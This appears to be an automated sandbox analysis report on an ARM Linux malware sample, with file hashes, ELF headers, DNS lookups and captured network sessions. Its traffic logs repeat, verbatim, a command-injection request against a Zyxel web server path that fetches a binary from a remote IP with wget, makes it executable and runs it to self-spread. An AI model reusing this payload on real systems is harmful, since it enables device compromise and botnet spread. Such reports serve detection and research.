                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            Process:/tmp/huhu.arm5.elf
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):19
                                            Entropy (8bit):3.7216117239699025
                                            Encrypted:false
                                            SSDEEP:3:TgCJtw5:TgCJM
                                            MD5:A434DB95431A02BADC1DE70DD30005F9
                                            SHA1:81444640B8D70362157C9066486BB7411AE2FF8A
                                            SHA-256:A79329377694A9D7DB9715F658135C04221F4E641E62A0DE5254DAEE8542E9AA
                                            SHA-512:32C3A8B648BB687861DE9A7318C36C35589349C52C2929916354F43A792AFB8368B9362F00B8858B430A98D6376875A614F6C792660D382CBBE9B101B7D98BB0
                                            Malicious:false
                                            Preview:/tmp/huhu.arm5.elf.
                                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                            Entropy (8bit):5.562817753992072
                                            TrID:
                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                            File name:huhu.arm5.elf
                                            File size:146'336 bytes
                                            MD5:9f845a126a218536e514a059c13dc84d
                                            SHA1:6a29a981703c3a8582c97d8146211b95c7d213ba
                                            SHA256:e8e80d0f8d2592bc697262ecb361e0e180cbf58826c052fcd70df33b0e1f5a21
                                            SHA512:59a8863325ed48f9bab5f069fff480f437845f1d61251223f4daf1c8a322c01bd91ab8d8d8180e6fdf85c8c2fc172afef9f9aad1fa86f5958e55c736584b97cf
                                            SSDEEP:3072:XA6p8wRZgfDdB1f984+Wcd/ny1Kzxf2XJ6A:XAeKfrZ984+Hd/nJz12XEA
                                            TLSH:69E31A45FC908A23C6D212BBFB5E428D372617E8D3EE72039D216F64378695B0E37646
                                            File Content Preview:.ELF...a..........(.........4....:......4. ...(......................................................I..............Q.td..................................-...L."...ym..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                            ELF header

                                            Class:ELF32
                                            Data:2's complement, little endian
                                            Version:1 (current)
                                            Machine:ARM
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:ARM - ABI
                                            ABI Version:0
                                            Entry Point Address:0x8190
                                            Flags:0x2
                                            ELF Header Size:52
                                            Program Header Offset:52
                                            Program Header Size:32
                                            Number of Program Headers:3
                                            Section Header Offset:145936
                                            Section Header Size:40
                                            Number of Section Headers:10
                                            Header String Table Index:9
                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                            NULL0x00x00x00x00x0000
                                            .initPROGBITS0x80940x940x180x00x6AX004
                                            .textPROGBITS0x80b00xb00x1b61c0x00x6AX0016
                                            .finiPROGBITS0x236cc0x1b6cc0x140x00x6AX004
                                            .rodataPROGBITS0x236e00x1b6e00x2f200x00x2A004
                                            .ctorsPROGBITS0x2f0000x1f0000xc0x00x3WA004
                                            .dtorsPROGBITS0x2f00c0x1f00c0x80x00x3WA004
                                            .dataPROGBITS0x2f0200x1f0200x49b00x00x3WA0032
                                            .bssNOBITS0x339d00x239d00x46140x00x3WA004
                                            .shstrtabSTRTAB0x00x239d00x3e0x00x0001
                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                            LOAD0x00x80000x80000x1e6000x1e6006.10700x5R E0x8000.init .text .fini .rodata
                                            LOAD0x1f0000x2f0000x2f0000x49d00x8fe40.47400x6RW 0x8000.ctors .dtors .data .bss
                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Feb 2, 2024 06:20:23.124785900 CET192.168.2.158.8.8.80x465Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:32.432642937 CET192.168.2.158.8.8.80x9b55Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:42.741754055 CET192.168.2.158.8.8.80x360dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:51.050669909 CET192.168.2.158.8.8.80xe81dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:54.359225035 CET192.168.2.158.8.8.80x5a2bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:04.673474073 CET192.168.2.158.8.8.80xc99bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:07.981254101 CET192.168.2.158.8.8.80x7a0dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:09.293719053 CET192.168.2.158.8.8.80xcd34Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:18.624783993 CET192.168.2.158.8.8.80x336Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:27.928158045 CET192.168.2.158.8.8.80x7b74Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:30.239006042 CET192.168.2.158.8.8.80x61feStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:34.547396898 CET192.168.2.158.8.8.80xdc94Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:50.659033060 CET192.168.2.158.8.8.80x2b1bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:22:05.770442963 CET192.168.2.158.8.8.80xdb86Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:22:24.881921053 CET192.168.2.158.8.8.80x969fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Feb 2, 2024 06:20:23.228327036 CET8.8.8.8192.168.2.150x465No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:32.535059929 CET8.8.8.8192.168.2.150x9b55No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:42.843903065 CET8.8.8.8192.168.2.150x360dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:51.153413057 CET8.8.8.8192.168.2.150xe81dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:20:54.463012934 CET8.8.8.8192.168.2.150x5a2bNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:04.775718927 CET8.8.8.8192.168.2.150xc99bNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:08.085356951 CET8.8.8.8192.168.2.150x7a0dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:09.396166086 CET8.8.8.8192.168.2.150xcd34No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:18.726963043 CET8.8.8.8192.168.2.150x336No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:28.032814980 CET8.8.8.8192.168.2.150x7b74No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:30.344652891 CET8.8.8.8192.168.2.150x61feNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:34.649837971 CET8.8.8.8192.168.2.150xdc94No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:21:50.761003017 CET8.8.8.8192.168.2.150x2b1bNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:22:05.872741938 CET8.8.8.8192.168.2.150xdb86No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Feb 2, 2024 06:22:24.984667063 CET8.8.8.8192.168.2.150x969fNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                            Session IDSource IPSource PortDestination IPDestination Port
                                            0192.168.2.1533910161.205.214.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151247978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1192.168.2.153692665.201.8.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151303053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2192.168.2.1559764197.17.236.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151310921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192.168.2.15408461.212.202.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151340961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4192.168.2.1541578114.8.84.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151387930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192.168.2.155358492.66.82.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151387930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6192.168.2.1540100105.151.5.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151420116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7192.168.2.1552296116.171.19.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151448011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8192.168.2.1553150217.118.61.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151479959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9192.168.2.155091649.83.176.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151518106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10192.168.2.1552828153.20.195.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151531935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11192.168.2.1540260192.33.248.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151539087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12192.168.2.1560000103.196.162.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151566982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13192.168.2.153551843.59.153.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151591063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14192.168.2.154221677.64.10.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151655912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15192.168.2.155922281.226.207.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151659966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16192.168.2.1542326160.34.189.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151665926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17192.168.2.1549936128.22.218.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151694059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18192.168.2.154357678.119.187.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151715994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19192.168.2.1543118222.28.43.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151743889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192.168.2.1558396142.4.131.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.151757002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21192.168.2.1543022188.97.176.244443
                                            TimestampBytes transferredDirectionData
